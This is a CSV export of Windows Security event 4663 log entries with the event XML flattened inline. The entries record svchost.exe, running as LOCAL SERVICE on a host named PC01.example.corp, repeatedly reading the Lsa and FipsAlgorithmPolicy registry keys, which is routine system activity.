SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452814 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:14.634426+04:00,1553038514.634426,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452813 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452922 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.365477+04:00,1553038515.365477,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452921 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.365477+04:00,1553038515.365477,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452920 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.365477+04:00,1553038515.365477,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452919 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.365477+04:00,1553038515.365477,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452918 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452917 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452916 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452915 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452914 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452913 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452912 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452911 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452910 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452909 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452908 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452907 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452906 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452905 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452904 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452903 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452902 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452901 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452900 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452899 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452898 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452897 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452896 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452895 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452894 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452893 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452892 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452891 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452890 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452889 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452888 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452887 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452886 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452885 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452884 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452883 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452882 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452881 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452880 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452879 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452878 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452877 + + + + + Security + 